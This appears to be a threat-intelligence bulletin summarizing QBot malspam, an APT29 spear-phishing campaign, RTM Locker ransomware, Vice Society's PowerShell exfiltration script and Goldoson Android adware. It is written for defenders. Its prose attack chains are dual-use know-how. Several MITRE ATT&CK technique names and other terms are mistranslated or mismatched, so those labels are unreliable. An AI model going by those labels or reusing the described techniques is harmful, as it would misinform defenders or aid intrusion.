The various threat intelligence stories in this iteration of Anomali Cyber Watch cover the following topics: APT, Clicker, Conversation hijacking, Data exfiltration, Malspam, Phishing, Ransomware, Russia, and supply chain. IOCs related to these stories are attached to the Anomali Cyber Watch and can be used to check logs for potentially malicious activity.
Figure 1 – IOC summary chart. This chart summarizes the IOCs attached to this magazine and provides a glimpse into the threats discussed.
The latest cyber news and threat intelligence
QBot Banker delivered via business correspondence
(Post Date: Apr 17, 2023)
In early April 2023, we detected an increase in the amount of malicious spam leveraging business email thread hijacking that delivers the QakBot, QuackBot, Pinkslipbot (QBot) banking trojan. Observed lures in English, German, Italian, and French target different countries, with the top three being Germany, Argentina, and Italy, in that order. The attacker spoofed names in the hijacked conversation to convince the target to open the attached PDF file. The target is then confronted with buttons, passwords, and commands to download, unpack, and run a malicious Windows Script File (WSF) within a password-protected archive. User execution is followed by automatic deobfuscation of the embedded JScript, which downloads the QBot DLL from the compromised website and generates an encoded PowerShell script for execution with the help of rundll32. QBot steals credentials, profiles systems to identify potential customers for further high-value targeting, and steals locally stored emails for further spread via thread hijacking malware.
Analyst Comments: Because this campaign uses a fraudulent email address that is different from the sender’s real email address, sender name spoofing can be identified from the preceding characters in the ‘From’ field. Users should be wary of questionable file types such as password-protected archives and WSF. Network and host-based metrics related to this QBot campaign are available on the Anomali platform and customers are encouraged to block them in their infrastructure.
Miter Attack: [MITRE ATT&CK] T1566 – Phishing | [MITRE ATT&CK] T1204 – User run | [MITRE ATT&CK] T1207 – Rogue Domain Controller | [MITRE ATT&CK] T1140 – File or Information Obfuscation/Decoding | [MITRE ATT&CK] T1059.001: Powershell | [MITRE ATT&CK] T1218.011 – Run Signed Binary Proxy: Rundll32 | [MITRE ATT&CK] T1090 – Proxy | [MITRE ATT&CK] T1114.001 – Email Collection: Local Email Collection | [MITRE ATT&CK] T1555 – Credentials in Password Store | [MITRE ATT&CK] T1539 – Web Session Cookie Stealing | [MITRE ATT&CK] T1105 – Transmit Receive Tool
tag: Malware:QBot, Malware Type:Banking Trojan, Malware:QakBot, Malware:QuackBot, Malware:Pinkslipbot, Detect:Trojan-Banker.Win32.Qbot, Target Country:Germany, Target Country:DE, Target Country:Argentina , Target Country :AR, Target Country:Italy, Target Country:IT, Campaign:Obama249, Abuse:PowerShell, File Type:WSF, File Type:DLL, File Type:PDF, File Type:ZIP , JScript, Technology:Email Thread Hijacking, Technology :conversation hijacking, technology:compromised website, abuse:Base64, abuse:rundll32, target system:Windows
Spy campaign linked to Russian intelligence
(Post Date: Apr 13, 2023)
A new cyberespionage campaign by the Russian-backed group Cozy Bear (APT29, Nobelium) is targeting NATO and European Union member states and, to a lesser extent, Africa. The embassy-themed spear-phishing link leads to a compromised website with a custom EnvyScout script that utilizes HTML smuggling techniques. SnowyAmber used since October 2022, QuarterRig used since March 2023, and HalfRig used since February 2023. The last observed payload was an attack framework beacon (Cobalt Strike or Brute Ratel).
Analyst Comments: Many advanced attacks start with spear phishing emails. It’s important to teach users basic online hygiene and phishing awareness. Metrics related to this Cozy Bear campaign are available on the Anomali platform and customers are encouraged to block them in their infrastructure. Network defenders can use the Polish government’s YARA rules to identify custom backdoors associated with this campaign.
Miter Attack: [MITRE ATT&CK] T1583.003 – Secure Infrastructure: Virtual Private Server | [MITRE ATT&CK] T1583.006 – Secure Infrastructure: Web Services | [MITRE ATT&CK] T1584 – Infrastructure Damage | [MITRE ATT&CK] T1566 – Phishing | [MITRE ATT&CK] T1566.001 – Fishing: Spearfishing Attachment | [MITRE ATT&CK] T1566.002 – Phishing: Spear Phishing Links | [MITRE ATT&CK] T1204 – User run | [MITRE ATT&CK] T1204.002 – User Executed: Malicious File | [MITRE ATT&CK] T1547.001 – Run Boot or Logon Autostart: Registry Execution Key/Startup Folder | [MITRE ATT&CK] T1574.001 – Hijacking Execution Flow: Dll Search Order Hijacking | [MITRE ATT&CK] T1574.002 – Stealing Execution Flow: Dll Sideloading | [MITRE ATT&CK] T1027.006 – Obfuscated Files or Information: HTML Smuggling | [MITRE ATT&CK] T1140 – File or Information Obfuscation/Decoding | [MITRE ATT&CK] T1553.005 – Trust Control Breaking: Mark-Of-The-Web Bypass | [MITRE ATT&CK] T1574.001 – Hijacking Execution Flow: Dll Search Order Hijacking | [MITRE ATT&CK] T1574.002 – Stealing Execution Flow: Dll Sideloading | [MITRE ATT&CK] T1102 – Web service | [MITRE ATT&CK] T1102.003 – Web Services: Unidirectional Communication
signature: APT29 HalfRig obfuscation. YARA by CERT Polska | APT29 Quarter League. YARA by CERT Polska | APT29 SnowyAmber Downloader. YARA by CERT Polska
tag: Actor:Cozy Bear, Actor:Nobelium, Miter Group:APT29, Target Region:NATO, Target Region:European Union, Target Region:Africa, Source Country:Russia, Source Country:RU, Skill:HTML Smuggling , Malware: EnvyScout, Malware :SnowyAmber, Malware:QuarterRig, Malware: HalfRig, Malware: Cobalt Strike, Malware: Brute Ratel, Abuse:NOTION Collaboration Service, Target System:Windows
Read Manual Archives: Private RaaS Providers
(Post Date: Apr 13, 2023)
The Read The Manual (RTM) Locker group is a new ransomware-as-a-service (RaaS) provider with potential links to the Commonwealth of Independent States. This group operates Windows-targeted ransomware focused on double extortion attacks on corporate environments. The RTM Locker malware requires affiliates to provide administrative privileges on compromised networks. To increase encryption effectiveness, the locker will attempt to mount all unmounted partitions on unused drives until all 26 drive letters have been used. RTM Locker uses input/output completion ports to allow multiple threads to work on the same file at the same time. The RTM Locker group prevents direct spread via malspam, marks builds to prevent premature leaks, clears logs and removes lockers after a system is encrypted. The group also uses strict rules to ensure that affiliates adhere to targeting rules and are removed if there is no unauthorized activity for more than 10 days.
Analyst Comments: Multi-threading enables fast encryption in RTM Locker. Ransomware is a constantly evolving threat, and the most fundamental defense is to have a proper backup and restore process in place to recover affected data without having to decrypt it. Data theft can be contained through segmentation, encryption of data at rest, and limiting storage of personal and sensitive data.
Miter Attack: [MITRE ATT&CK] T1057 – Process Search | [MITRE ATT&CK] T1070.001 – Remove Indicator from Host: Clear Windows Event Log | [MITRE ATT&CK] T1070.004 – Remove Indicator from Host: Delete File | [MITRE ATT&CK] T1106: Native API | [MITRE ATT&CK] T1134.002 – Access Token Manipulation: Creating Processes with Tokens | [MITRE ATT&CK] T1486: Encrypted Data for Impact | [MITRE ATT&CK] T1489 – Stop service
tag: Actor:RTM Locker, Malware:RTM Locker, Malware-Type:RaaS, Malware-Type:Ransomware, Detection:RTMLocker, Abuse:TOX, Abuse:IOCP, Source Region:Commonwealth of Independent States, Source Region:CIS, Target -System:Windows
Vice Society: A Tale of Victim Data Exfiltration via PowerShell, aka Stealing off the Land
(Post Date: Apr 13, 2023)
A new PowerShell data exfiltration script in use by the Vice Society ransomware group has been detected. An attacker could gain access to the target’s domain controller and distribute this script to any endpoint within the network. It is launched with parameters that bypass execution policy restrictions and is initiated by identifying drives mounted on the system via Windows Management Instrumentation. The script automatically identifies and processes directory names for all directories on each mounted volume that do not match the ignore list. It then uses additional keywords and parameters to select directories and files to forward to exfiltrate to the attacker’s web server via an HTTP POST request. The script implements rate limiting to ensure that the host’s resources are not overused.
Analyst Comments: Detection is difficult using Living Off the Land Binaries and Scripts (LOLBAS) methods such as PowerShell scripts and WMI. Network defenders can check the Windows Event Log (WEL) event IDs 400, 600, 800, 4103, and 4104. Monitor HTTP POST events to endpoints of unknown remote HTTP servers and HTTP activity to external IP addresses. Detect this malicious PowerShell leak activity using Palo Alto Networks YARA signatures.
Miter Attack: [MITRE ATT&CK] T1059.001: Powershell | [MITRE ATT&CK] T1020 – automatic spill | [MITRE ATT&CK] T1083 – File and Directory Search | [MITRE ATT&CK] T1005: Data from local system
signature: Vice Society PS Exfil script. YARA by PaloAltoNetworks
tag: Actor:Vice Society, Malware-Type:Ransomware, Malware-Type:Exfiltration Tool, Data Exfiltration, abosed:PowerShell, Technology:Land Living in Binaries and Scripts, Technology:LOLBAS, Technology:Rate Limiting, Windows Event Log, Target- System: windows
Goldoson: Privacy Invasion and Clicker Android Adware Found in Popular South Korean App
(Post Date: Apr 12, 2023)
A malicious Android library called Goldoson has been found to primarily target South Korean users. McAfee researchers detected it in applications with over 100 million downloads on Google Play and over 8 million downloads on the ONE store, a popular app store in South Korea. Goldawson collects information about the user’s location, access history, and installed applications. The library either obtains the permission from the app or specifically asks the user to allow the location permission. Goldoson also generates hidden deceptive traffic by loading HTML code and injecting it into a customized, hidden WebView and recursively visiting URLs.
Analyst Comments: All applications identified as affected have been updated or removed from the official store. Users are advised to regularly review the list of installed applications and uninstall applications that are no longer needed. Keep an eye out for signs of malicious resource usage, such as overheating your device and rapid battery drain. Do not grant unnecessary permissions, such as location permissions, unless you know that the application needs them to produce the desired functionality. Network metrics related to Goldoson adware are available on the Anomali platform and customers are encouraged to block them in their infrastructure.
Miter Attack: [MITRE ATT&CK] T1474.001 – Supply Chain Corruption: Software Dependencies and Development Tools Corruption | [MITRE ATT&CK] T1406 – Obfuscated files or information | [MITRE ATT&CK] T1430 – Location Tracking | [MITRE ATT&CK] T1424 – Process Search | [MITRE ATT&CK] T1646 – Outflow through C2 channel | [MITRE ATT&CK] T1643 – Generate Traffic from Victims
tag: Malware:Goldoson, Malware Type:Clicker, Malware Type:Adware, Supply Chain, Target Country:South Korea, Target Country:KR, Malware Type:Compromised App, Malware Type:Malware Library, Target:Mobile, Abuse:Google Play, Abuse:ONE Store, Target System:Android